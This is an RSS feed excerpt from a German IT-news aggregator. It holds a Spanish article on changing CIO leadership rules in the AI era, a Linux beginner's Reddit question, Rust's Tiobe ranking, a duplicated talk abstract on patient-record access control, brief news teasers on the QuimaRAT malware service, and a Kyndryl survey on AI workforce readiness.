					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>La IA está cambiando la forma en que se realiza el trabajo y quién lo lleva a cabo, en todos los niveles de la organización. Esto significa que también está cambiando la forma en que los ejecutivos desempeñan su labor y cómo deben liderar, ya que ahora se les pide que utilicen la IA para reinventar sus organizaciones y hacer frente a las incertidumbres que conlleva esa tarea.</p>



<p>Los directores de sistemas de información (CIO) están experimentando cambios en su función como parte de esta tendencia general, a medida que asumen nuevas responsabilidades y se enfrentan a nuevas expectativas. Estos cambios son el resultado de una evolución de varios años entre los CIO, que ha transformado el puesto, pasando de ser un simple gestor tecnológico a un facilitador estratégico y, finalmente, al líder visionario que deben ser hoy en día.</p>



<p>A continuación, directores de sistemas de información (CIO) con amplia experiencia, investigadores y asesores comparten seis nuevas reglas del liderazgo en TI, junto con los antiguos principios de liderazgo a los que han sustituido.</p>



<h2 class="wp-block-heading">Regla antigua: rendir cuentas al director general<br>Nueva regla: colaborar con el director general para crear una visión</h2>



<p>Durante gran parte de la historia empresarial, el director general (CEO) determinaba el rumbo de la organización, y el resto de ejecutivos —incluido el CIO— elaboraban los planes que permitirían avanzar hacia la visión estratégica del director general. “Ahora el CIO tiene que estar indisolublemente unido al director general para crear esa visión”, afirma <a href="https://www.protiviti.com/us-en/sharon-stufflebeme" target="_blank" rel="nofollow">Sharon Stufflebeme</a>, directora general de soluciones para CIO en Protiviti.</p>



<p>“Significa tener la capacidad de ver el futuro, de comprender cómo este probablemente afectará a tu situación actual y cómo llevar tu situación actual hacia el futuro, de ver, anticipar y trazar una línea hacia lo que razonablemente va a suceder en el futuro y cómo la organización se adaptará a ello”, añade.</p>



<p>“Siempre ha sido importante, pero no era la competencia más importante que debía tener el director de sistemas de información. Ahora, el director de sistemas de información es quien está mejor preparado para comprender el valor que se puede obtener al aprovechar las nuevas tecnologías, incluida la inteligencia artificial, así como los costes y los riesgos, y para crear la visión y definir cómo llegar hasta allí”, agrega.</p>



<h2 class="wp-block-heading">Antigua regla: facilitar los resultados empresariales<br>Nueva regla: diseñar el negocio del futuro</h2>



<p>En los últimos años, los altos directivos han recurrido a los CIO para que les informen sobre la IA y les expliquen cómo puede utilizarse para generar resultados empresariales. Pero <a href="https://mitcio.com/members/4889556" target="_blank" rel="nofollow">Allan Tate</a>, presidente ejecutivo del MIT Sloan CIO Symposium, afirma que los equipos de dirección están elevando ahora sus expectativas, ya que esperan que sus CIO <a href="https://www.cio.com/article/4178006/state-of-the-cio-2026-cios-set-the-course-for-ai-roi.html">rediseñen la organización utilizando la inteligencia artificial</a>. “Ya no se trata de ‘qué puede hacer la IA’. La pregunta es: ‘¿Cómo rediseñamos la organización con la IA?”, afirma Tate. “Se trata de ‘cómo diseñamos nuestra organización para utilizar la IA de forma responsable y eficaz’. Eso es hacia lo que se dirigen los CIO. Lo que estamos viendo es que los CIO se están convirtiendo en arquitectos de la transformación”.</p>



<p>Esto exigirá que los directores de sistemas de información (CIO) lideren en medio de la incertidumbre y la tensión, añade. “Los directores de sistemas de información deben sentirse cómodos con la incertidumbre”, afirma Tate, señalando que deben aprender “a formular preguntas, a explorar diferentes perspectivas interpretativas para esas preguntas, a analizar las distintas tensiones y a combinar la inteligencia humana y la artificial. Y los CIO tienen que ayudar a los demás a acostumbrarse a la incertidumbre. Deben comprender que no va a haber consenso. A lo que se enfrentan es a ejercer un mejor criterio ejecutivo en medio de esa incertidumbre, y querrán crear un entorno de confianza en el que los empleados vean que todos prosperarán y no se sientan amenazados”.</p>



<p>Reconoce el temor a que desaparezcan puestos de trabajo a medida que la IA automatiza cada vez más el trabajo, pero los directores de sistemas de información deberían ayudar a sus colegas ejecutivos a pensar en las posibilidades —incluidas <a href="https://www.computerworld.es/article/4191166/jose-maria-beneyto-aec-la-ia-no-producira-el-gran-reemplazo-de-profesionales-pero-si-un-gran-reskilling-y-upskilling.html">nuevas funciones</a>— que creará la transformación impulsada por la IA. “Lo difícil es imaginar qué nuevos puestos de trabajo se crearán, algo que ha ocurrido en todas y cada una de las revoluciones tecnológicas”, añade Tate.</p>



<h2 class="wp-block-heading">Antigua regla: fracasar rápido<br>Nueva regla: crear las condiciones para que las personas se sientan seguras para prosperar</h2>



<p>Una de las promesas más repetidas y menos cumplidas del sector tecnológico ha sido renovada debido a su propio fracaso constante. En lugar de limitarse a descartar rápidamente los proyectos poco prometedores, los responsables de TI deben crear ahora un entorno en el que el fracaso resulte lo suficientemente seguro como para que los empleados extraigan lecciones de los callejones sin salida y las apliquen para escalar con rapidez.</p>



<p><a href="https://www.linkedin.com/in/brookcolangelo/" target="_blank" rel="nofollow">Brook Colangelo</a>, vicepresidente sénior y director de sistemas de información (CIO) de Waters Corp., una empresa de instrumentos analíticos de laboratorio y software, utiliza un “diagnóstico sencillo” para su organización global de TI. “En cualquier situación en la que un equipo tenga un rendimiento inferior al esperado o se resista al cambio, me pregunto cuál de las cinco necesidades psicológicas se ve amenazada —estatus, certeza, autonomía, conexión o equidad— y la abordo de forma directa y compasiva”, afirma.</p>



<p>Se apoya en la cultura de la organización para llevar a cabo esta tarea. “El departamento de TI de Waters es un equipo basado en la neurociencia de la motivación y el crecimiento. Celebramos nuestros éxitos, analizamos nuestros errores y aprendemos como equipo”, afirma Colangelo.</p>



<p>Considera que la capacidad de diagnosticar y abordar esas amenazas es una competencia de liderazgo fundamental para el director de sistemas de información (CIO) actual, sobre todo porque «las organizaciones de TI son, por naturaleza, entornos propensos a las amenazas, y más aún con la inteligencia artificial».</p>



<p>“Nos llevó un tiempo desarrollar esta capacidad, pero lo conseguimos mediante una formación específica, y dotamos a nuestros líderes de equipo —a través del Foro de Liderazgo de TI— de las herramientas necesarias para dar ejemplo y reconocer estos comportamientos”, explica.</p>



<p>Colangelo atribuye a esta inversión en la cultura de equipo la capacidad de su departamento de TI para liderar simultáneamente cuatro iniciativas de gran envergadura: la integración de una adquisición, la incorporación de los compañeros de su centro de capacidades global en la India como empleados a tiempo completo de Waters con una tasa de aceptación del 99%, una transformación completa de su ERP a S/4HANA, y la puesta en marcha segura de su transformación hacia la IA en toda la organización. “Cada iniciativa provoca respuestas diferentes en cada persona. Disponer de un lenguaje común para identificar esas señales de alerta nos permite diagnosticar qué es lo que nos está frenando y abordarlo directamente”, añade.</p>



<h2 class="wp-block-heading">Antigua regla: recurrir a expertos en el negocio<br>Nueva regla: ser un experto en el negocio</h2>



<p>Los CIO comprendieron hace años que no podrían desempeñar con éxito su función si se centraban únicamente en la tecnología. Así pues, se asociaron con compañeros del ámbito empresarial para recabar perspectivas sobre los diversos puntos débiles y problemas que obstaculizaban las ambiciones empresariales, y colaboraron con sus homólogos ejecutivos para comprender las metas y los objetivos de las distintas áreas funcionales del negocio.</p>



<p>Ahora los CIO deben dar otro salto y parecerse más a un director de operaciones (COO), es decir, comprender el alcance y la escala completos de las operaciones en sus organizaciones, afirma <a href="https://wittkieffer.com/consultants/jeffrey-sturman" target="_blank" rel="nofollow">Jeff Sturman</a>, socio director del área de liderazgo digital y de TI en WittKieffer, una consultora especializada en liderazgo y selección de personal.</p>



<p>«Los CIO se encuentran ahora en la encrucijada de todas las actividades: estratégicas, operativas y de experiencia del cliente. Es un puesto que abarca todos y cada uno de los aspectos del negocio», afirma Sturman. “Los CIO siguen teniendo que ser expertos en tecnología, seguridad y, ahora, en IA; tienen que ser las personas más preparadas de la sala en esos temas, pero ahora también deben conocer todos los aspectos de las operaciones de la organización, al igual que el director de operaciones (COO), porque hoy en día no hay ninguna parte del negocio que no esté relacionada con el responsable de TI”.</p>



<p>Los <a href="https://www.computerworld.es/article/4175733/computerworld-y-la-seis-toman-el-pulso-a-la-digitalizacion-de-la-sanidad-publica-espanola-en-2025.html">CIO del sector sanitario</a>, por ejemplo, deben comprender las operaciones empresariales, los requisitos normativos, las operaciones clínicas y mucho más, afirma Sturman. Añade que, por supuesto, el resto de miembros del equipo directivo también deben conocer el negocio. Pero, dado que el departamento de TI lidera las implementaciones de IA que automatizan y transforman el trabajo, los CIO deben tener una comprensión más profunda de las operaciones y los flujos de trabajo en todos los ámbitos que muchos de sus colegas ejecutivos.</p>



<p>Sturman señala que no todos los directores de TI tienen ese nivel de conocimiento, pero observa que cada vez más responsables de TI están adquiriendo lo que él denomina una “visión panorámica de las operaciones de la organización”.</p>



<h2 class="wp-block-heading">Antigua regla: tener un buen dominio de las finanzas de la organización<br>Nueva regla: actuar como un director financiero</h2>



<p>Al igual que muchos CIO, <a href="https://www.redhat.com/en/en/about/company/leadership/marco-bill" target="_blank" rel="nofollow">Marco Bill</a>, vicepresidente sénior y CIO de Red Hat, se enfrenta a más cálculos financieros que nunca, ya que trabaja para garantizar que el gasto de la empresa en la nube y en IA sea eficiente, sabiendo qué medidas tomar para controlar los costes sin mermar el rendimiento.</p>



<p>Por ejemplo, él y su equipo están analizando las cargas de trabajo para determinar si resulta más rentable ejecutarlas en la nube pública, en una nube privada o alojarlas en los propios centros de datos de la empresa. Ha conseguido un ahorro de más de 20 millones de dólares al trasladar algunas cargas de trabajo de nuevo a las instalaciones propias, y cuenta con los cálculos financieros que lo demuestran. “Y no se trata de hacer estos cálculos una sola vez, sino de hacerlo de forma continua”, añade.</p>



<p>Stufflebeme también observa que los CIO se están adentrando más en el ámbito financiero con iniciativas de inteligencia artificial, ya que los directores generales y los consejos de administración exigen rendimientos cuantificables de sus inversiones. “El departamento de TI debe tener la visión [que la organización debe seguir] y también la perspicacia financiera para demostrar qué inversiones van a generar un retorno de la inversión. Por eso, ahora es fundamental que los directores de sistemas de información comprendan dónde va a estar el valor y dónde están los costes. Estas son habilidades que los directores de sistemas de información siempre han tenido que poseer, pero ahora son más cruciales debido al impacto de la IA”, añade.</p>



<p>Dados los retos que ha supuesto hasta ahora obtener un retorno de la inversión en IA —y la creciente intolerancia de los ejecutivos ante las iniciativas fallidas en este ámbito—, Stufflebeme afirma que los consejos de administración y los directores generales quieren directores de sistemas de información que “entiendan cómo se genera el valor, cómo cuantificarlo y que puedan garantizar que se alcanza ese valor”.</p>



<p>Esto requiere, a su vez, que los directores de sistemas de información sepan cómo van a cambiar los costes a medida que los agentes sustituyan ciertas actividades humanas, añade, “porque los agentes no eliminan los costes, pero sí modifican la estructura de costes. Por lo tanto, los directores de sistemas de información deben comprender cómo calcular el coste total de propiedad de estas nuevas capacidades. Esto es válido no solo para sus propias empresas, sino también para sus socios, ya que los directores de sistemas de información deben saber que el valor que obtienen de sus socios es superior al coste que les pagan”.</p>



<h2 class="wp-block-heading">Antigua regla: esperar que los empleados respondan al estilo de liderazgo del CIO<br>Nueva regla: adaptar el estilo a las personas del equipo</h2>



<p><a href="https://www.linkedin.com/in/gregtaffet/" target="_blank" rel="nofollow">Greg Taffet</a>, socio director y director de sistemas de información (CIO) de la consultora tecnológica estratégica Taffet Associates, cree que debe adaptar su estilo de liderazgo y la forma en que interactúa con los demás miembros de su organización, incluidos los de su equipo. “Tengo gente repartida por todo el mundo, y gestionarla ahora es muy diferente a cuando podíamos reunirnos junto a la máquina de agua”, afirma.</p>



<p>Taffet explica que, como líder, se esfuerza por comprender cómo y cuándo quieren trabajar las personas: si prefieren trabajar totalmente a distancia y de forma asíncrona, si quieren estar en la oficina con un horario fijo, o si optan por una combinación de ambas opciones. “Cada persona tiene necesidades diferentes para ser productiva; no se puede esperar que todo el mundo trabaje desde casa y sea productivo, ni que todos sean tan productivos como lo eran cuando trabajaban en la oficina”, explica.</p>



<p>También se esfuerza por comprender cualquier rasgo cultural o personal que pueda influir en su respuesta a los distintos enfoques de liderazgo, y por identificar cómo sacar lo mejor de cada persona y defender lo que mejor les funciona. Al igual que los colegios adaptan las clases a los alumnos en función de si aprenden de forma visual, auditiva o práctica, “eso es lo que tenemos que aplicar ahora en el liderazgo”, afirma.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Newbie's intro]]></title>
<description><![CDATA[I am a fresh computer science student. I want to purchase a laptop to run Linux on, so I can learn how to use terminal commands, and also continue learning C++, Python, and Java. The only think I know about Linux is that it is obviously an operating system, but there are different versions called...]]></description>
<link>https://tsecurity.de/de/3650330/linux-tipps/newbies-intro/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650330/linux-tipps/newbies-intro/</guid>
<pubDate>Tue, 07 Jul 2026 04:25:32 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I am a fresh computer science student. I want to purchase a laptop to run Linux on, so I can learn how to use terminal commands, and also continue learning C++, Python, and Java. The only think I know about Linux is that it is obviously an operating system, but there are different versions called distros? How do I pick the best version for just coding and web searches? That's really all I'd need. I'm somewhat comfortable with Windows 10 and it's command prompt / powershell, if that context matters here. </p> <p>​</p> <p>Just looking for tips on the correct direction to head! </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/FTP-Jade"> /u/FTP-Jade </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1upe415/newbies_intro/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1upe415/newbies_intro/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rust language rises to top 10 in Tiobe popularity index]]></title>
<description><![CDATA[For the first time ever, the Rust language has cracked the top 10 in Tiobe’s index of programming language popularity.



With a 1.34% rating, Rust is ranked 10th in the Tiobe Programming Community index for July 2026, which was published July 5. “Rust’s growing popularity can largely be attribut...]]></description>
<link>https://tsecurity.de/de/3649990/ai-nachrichten/rust-language-rises-to-top-10-in-tiobe-popularity-index/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649990/ai-nachrichten/rust-language-rises-to-top-10-in-tiobe-popularity-index/</guid>
<pubDate>Mon, 06 Jul 2026 23:48:55 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For the first time ever, the <a href="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html">Rust language</a> has cracked the top 10 in Tiobe’s index of programming language popularity.</p>



<p>With a 1.34% rating, Rust is ranked 10th in the <a href="https://www.tiobe.com/tiobe-index/">Tiobe Programming Community index for July 2026</a>, which was published July 5. “Rust’s growing popularity can largely be attributed to its strong focus on memory safety while still generating extremely fast code,” said Paul Jansen, CEO at software quality services provider Tiobe.</p>



<p>“[Rust] is widely regarded as a direct competitor to <a href="https://www.infoworld.com/article/2261151/why-the-c-programming-language-still-rules.html">C</a> and <a href="https://www.infoworld.com/article/4065702/safe-c-proposal-for-memory-safety-flames-out.html">C++</a>, both of which continue to struggle with the challenges of explicit memory management and are therefore often considered less safe,” Jansen said. “That said, the C and C++ communities are actively working on making their languages safer. Time will tell whether these efforts will pay off in time.”</p>



<p>The Tiobe index marks its 25th anniversary this month. Tiobe’s ratings are based on the number of skilled engineers, courses, and third-party vendors pertinent to a language, calculated using popular websites such as Google, Bing, Amazon, and Wikipedia.</p>



<p>Tiobe’s top 10 programming languages for July 2026:</p>



<ol start="1" class="wp-block-list">
<li><a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html">Python</a>, 18.94%</li>



<li>C, 10.86%</li>



<li>C++, 9.12%</li>



<li><a href="https://www.infoworld.com/article/4050993/jdk-26-the-new-features-in-java-26.html">Java</a>, 8.03%</li>



<li><a href="https://www.infoworld.com/article/4131649/the-best-new-features-of-c-14.html">C#</a>, 4.49%</li>



<li><a href="https://www.infoworld.com/article/2263137/what-is-javascript-the-full-stack-programming-language.html">JavaScript</a>, 2.72%</li>



<li>Visual Basic, 2.48%</li>



<li>SQL, 1.71%</li>



<li>R, 1.69%</li>



<li>Rust, 1.34%</li>
</ol>



<p>Jansen said Tiobe will publish a programming language flowchart designed to help developers select the most suitable programming language for their specific use case. The flowchart will be published on the Tiobe website this week or next week.</p>



<p>The alternative Pypl Popularity of Programming Language Index assesses language popularity by analyzing how often language tutorials are searched on in Google.</p>



<p>The Pypl top 10 programming langages for July 2026:</p>



<ol start="1" class="wp-block-list">
<li>Python, 47.49%</li>



<li>Java, 11.44%</li>



<li>C/C++, 9.68%</li>



<li>R, 4.68%</li>



<li>JavaScript, 3.97%</li>



<li>Objective-C, 3.15%</li>



<li>PHP, 2.29%</li>



<li>C#, 2.06%</li>



<li>Rust, 2.06%</li>



<li>Swift, 1.98%</li>
</ol>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sicherheitsarchitektur für den kontrollierten Zugriff auf mobile digitale Patientenakten (ds2009)]]></title>
<description><![CDATA[Kurzbeschreibung:
Am Lehrstuhl für Betriebssysteme und Verteilte System der Universität Potsdam wurde eine praktikable Methode für die Durchsetzung des besitzerkontrollierten Zugriffsschutzes auf mobile elektronische Patientendaten entwickelt:
- Patientendaten werden als XML-kodierte Daten erfass...]]></description>
<link>https://tsecurity.de/de/3649834/it-security-video/sicherheitsarchitektur-fuer-den-kontrollierten-zugriff-auf-mobile-digitale-patientenakten-ds2009/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649834/it-security-video/sicherheitsarchitektur-fuer-den-kontrollierten-zugriff-auf-mobile-digitale-patientenakten-ds2009/</guid>
<pubDate>Mon, 06 Jul 2026 22:48:52 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kurzbeschreibung:
Am Lehrstuhl für Betriebssysteme und Verteilte System der Universität Potsdam wurde eine praktikable Methode für die Durchsetzung des besitzerkontrollierten Zugriffsschutzes auf mobile elektronische Patientendaten entwickelt:
- Patientendaten werden als XML-kodierte Daten erfasst
- Zugriffrichtlinien werden zusammen mit den Daten als XACML-Regeln gespeichert 
- Ein Referenzmonitor übersetzt die Richtlinien in eine Java Security Policy
- Das Java Security Framework wendet die Policy beim Zugriff auf die Daten an

Thema:
Sicherheitsarchitektur für den kontrollierten Zugriff auf mobile digitale Patientenakten

Beschreibung:
Am Lehrstuhl für Betriebssysteme und Verteilte System der Universität Potsdam wurde eine praktikable Methode für die Durchsetzung des besitzerkontrollierten Zugriffsschutzes auf mobile elektronische Patientendaten entwickelt:
- Patientendaten werden als XML-kodierte Daten erfasst
- Zugriffrichtlinien werden zusammen mit den Daten als XACML-Regeln gespeichert 
- Ein Referenzmonitor übersetzt die Richtlinien in eine Java Security Policy
- Das Java Security Framework wendet die Policy beim Zugriff auf die Daten an 

Eine praktische Vorführung des Systems ist möglich. In der Diskussion kann auf weitere mögliche Anwendungsmöglichkeiten für die kontrollierte Weitergabe schützenswerter Daten eingegangen werden.
about this event: https://datenspuren.de/2009/events/3337.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[Sicherheitsarchitektur für den kontrollierten Zugriff auf mobile digitale Patientenakten (ds2009)]]></title>
<description><![CDATA[Kurzbeschreibung:
Am Lehrstuhl für Betriebssysteme und Verteilte System der Universität Potsdam wurde eine praktikable Methode für die Durchsetzung des besitzerkontrollierten Zugriffsschutzes auf mobile elektronische Patientendaten entwickelt:
- Patientendaten werden als XML-kodierte Daten erfass...]]></description>
<link>https://tsecurity.de/de/3649809/it-security-video/sicherheitsarchitektur-fuer-den-kontrollierten-zugriff-auf-mobile-digitale-patientenakten-ds2009/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649809/it-security-video/sicherheitsarchitektur-fuer-den-kontrollierten-zugriff-auf-mobile-digitale-patientenakten-ds2009/</guid>
<pubDate>Mon, 06 Jul 2026 22:33:29 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kurzbeschreibung:
Am Lehrstuhl für Betriebssysteme und Verteilte System der Universität Potsdam wurde eine praktikable Methode für die Durchsetzung des besitzerkontrollierten Zugriffsschutzes auf mobile elektronische Patientendaten entwickelt:
- Patientendaten werden als XML-kodierte Daten erfasst
- Zugriffrichtlinien werden zusammen mit den Daten als XACML-Regeln gespeichert 
- Ein Referenzmonitor übersetzt die Richtlinien in eine Java Security Policy
- Das Java Security Framework wendet die Policy beim Zugriff auf die Daten an

Thema:
Sicherheitsarchitektur für den kontrollierten Zugriff auf mobile digitale Patientenakten

Beschreibung:
Am Lehrstuhl für Betriebssysteme und Verteilte System der Universität Potsdam wurde eine praktikable Methode für die Durchsetzung des besitzerkontrollierten Zugriffsschutzes auf mobile elektronische Patientendaten entwickelt:
- Patientendaten werden als XML-kodierte Daten erfasst
- Zugriffrichtlinien werden zusammen mit den Daten als XACML-Regeln gespeichert 
- Ein Referenzmonitor übersetzt die Richtlinien in eine Java Security Policy
- Das Java Security Framework wendet die Policy beim Zugriff auf die Daten an 

Eine praktische Vorführung des Systems ist möglich. In der Diskussion kann auf weitere mögliche Anwendungsmöglichkeiten für die kontrollierte Weitergabe schützenswerter Daten eingegangen werden.
about this event: https://datenspuren.de/2009/events/3337.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[QuimaRAT als MaaS: Java-RAT für Windows, Linux und macOS]]></title>
<description><![CDATA[LONDON / LONDON (IT BOLTWISE) – Sicherheitsforscher warnen vor QuimaRAT, einem plattformübergreifenden Remote-Access-Trojaner mit Java-Kern und MaaS-Angebot. Der Anbieter koppelt das Geschäftsmodell mit modularen Plugins, die sich aus einer Command-and-Control-Infrastruktur nachladen lassen. Für ...]]></description>
<link>https://tsecurity.de/de/3649093/it-security-nachrichten/quimarat-als-maas-java-rat-fuer-windows-linux-und-macos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649093/it-security-nachrichten/quimarat-als-maas-java-rat-fuer-windows-linux-und-macos/</guid>
<pubDate>Mon, 06 Jul 2026 16:36:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON / LONDON (IT BOLTWISE) – Sicherheitsforscher warnen vor QuimaRAT, einem plattformübergreifenden Remote-Access-Trojaner mit Java-Kern und MaaS-Angebot. Der Anbieter koppelt das Geschäftsmodell mit modularen Plugins, die sich aus einer Command-and-Control-Infrastruktur nachladen lassen. Für die Betreiber interessant: Ein Builder erzeugt Clients in vielen Formaten und ein Web-Loader-Mechanismus nutzt Browser-Cache-Logik, um eine spätere Ausführung anzustoßen. Für Unternehmen […]</p>
<div><a href="https://www.it-boltwise.de/quimarat-als-maas-java-rat-fuer-windows-linux-und-macos.html">... den vollständigen Artikel <strong>»QuimaRAT als MaaS: Java-RAT für Windows, Linux und macOS«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/quimarat-als-maas-java-rat-fuer-windows-linux-und-macos.html">QuimaRAT als MaaS: Java-RAT für Windows, Linux und macOS</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Java-Based QuimaRAT MaaS Built to Run on Windows, Linux, and macOS]]></title>
<description><![CDATA[Cybersecurity researchers have flagged a novel Java-based remote access trojan (RAT) called QuimaRAT that’s capable of targeting Windows, Linux, and macOS environments. According to LevelBlue, the cross-platform malware is advertised under a malware-as-a-service (MaaS) model, costing anywhere bet...]]></description>
<link>https://tsecurity.de/de/3648299/it-security-nachrichten/new-java-based-quimarat-maas-built-to-run-on-windows-linux-and-macos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648299/it-security-nachrichten/new-java-based-quimarat-maas-built-to-run-on-windows-linux-and-macos/</guid>
<pubDate>Mon, 06 Jul 2026 11:24:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybersecurity researchers have flagged a novel Java-based remote access trojan (RAT) called QuimaRAT that’s capable of targeting Windows, Linux, and macOS environments. According to LevelBlue, the cross-platform malware is advertised under a malware-as-a-service (MaaS) model, costing anywhere between $150 for…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-java-based-quimarat-maas-built-to-run-on-windows-linux-and-macos/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-java-based-quimarat-maas-built-to-run-on-windows-linux-and-macos/">New Java-Based QuimaRAT MaaS Built to Run on Windows, Linux, and macOS</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Java-Based QuimaRAT MaaS Built to Run on Windows, Linux, and macOS]]></title>
<description><![CDATA[Cybersecurity researchers have flagged a novel Java-based remote access trojan (RAT) called QuimaRAT that's capable of targeting Windows, Linux, and macOS environments.

According to LevelBlue, the cross-platform malware is advertised under a malware-as-a-service (MaaS) model, costing anywhere be...]]></description>
<link>https://tsecurity.de/de/3648267/it-security-nachrichten/new-java-based-quimarat-maas-built-to-run-on-windows-linux-and-macos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648267/it-security-nachrichten/new-java-based-quimarat-maas-built-to-run-on-windows-linux-and-macos/</guid>
<pubDate>Mon, 06 Jul 2026 11:10:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity researchers have flagged a novel Java-based remote access trojan (RAT) called QuimaRAT that's capable of targeting Windows, Linux, and macOS environments.

According to LevelBlue, the cross-platform malware is advertised under a malware-as-a-service (MaaS) model, costing anywhere between $150 for one month to $1,200 for lifetime access. Other subscription tiers include $300 for]]></content:encoded>
</item>
<item>
<title><![CDATA[El éxito de la IA depende de la preparación de la plantilla]]></title>
<description><![CDATA[La adopción de la IA en las empresas está superando la preparación de la plantilla, según un nuevo estudio de Kyndryl, que revela que solo el 23% de los directivos cree que sus organizaciones están preparadas para implementar la IA a gran escala.



El informe desvela que el 57% de las organizaci...]]></description>
<link>https://tsecurity.de/de/3647992/it-nachrichten/el-xito-de-la-ia-depende-de-la-preparacin-de-la-plantilla/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647992/it-nachrichten/el-xito-de-la-ia-depende-de-la-preparacin-de-la-plantilla/</guid>
<pubDate>Mon, 06 Jul 2026 09:02:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>La adopción de la IA en las empresas está superando la preparación de la plantilla<a href="https://www.networkworld.com/article/4174188/ai-reshapes-cybersecurity-workforce-priorities-as-it-teams-brace-for-new-risks.html" target="_blank"></a><strong>,</strong> según <a href="https://www.kyndryl.com/content/dam/kyndrylprogram/doc/en/2026/people-readiness-report.pdf" target="_blank" rel="nofollow">un nuevo estudio de Kyndryl</a>, que revela que solo el 23% de los directivos cree que sus organizaciones están preparadas para implementar la IA a gran escala<strong>.</strong></p>



<p>El informe desvela que el 57% de las organizaciones ha implantado la IA de forma generalizada o la ha integrado en los procesos empresariales fundamentales, mientras que el 77% ha ampliado el uso de la IA generativa a múltiples funciones. Según el <em>Informe sobre la preparación del personal para 2026</em> de la consultora, un grupo reducido de organizaciones participantes que están rediseñando funciones, invirtiendo en la preparación de la plantilla e implementando programas formales de gestión del cambio tiene más probabilidades de lograr un crecimiento de los ingresos y resultados innovadores gracias a la IA que sus homólogas.</p>



<p>“Este es un momento crítico para las empresas globales, que compiten por adoptar la IA, rediseñar los flujos de trabajo y buscar la innovación, pero se están dando cuenta de que su mayor activo —su personal— necesita más atención”, afirma Kim Basile, directora de sistemas de información de Kyndryl, en un <a href="https://www.kyndryl.com/us/en/about-us/news/2026/06/ai-adoption-workforce-readiness" target="_blank" rel="nofollow">comunicado</a>. “Los datos muestran que las organizaciones que invierten en su personal —ya sea replanteándose las funciones y los flujos de trabajo, dedicando recursos a la mejora de las competencias y al reciclaje profesional, o guiando a los empleados a través del cambio— están obteniendo resultados positivos en una proporción mucho mayor”.</p>



<p>Las empresas están compartiendo su grado de preparación para la IA en lo que respecta a su infraestructura, su estructura organizativa y su plantilla. Algunos de los aspectos más destacados del informe son:</p>



<ul class="wp-block-list">
<li>El 35% afirma que su infraestructura de TI está preparada para la IA.</li>



<li>El 25% afirma que su cultura organizativa está preparada.</li>



<li>El 23% afirma que las funciones de gobernanza y cumplimiento normativo están preparadas.</li>



<li>El 36% espera que las competencias de la plantilla y las estructuras de funciones estén totalmente preparadas para la IA a finales de año.</li>



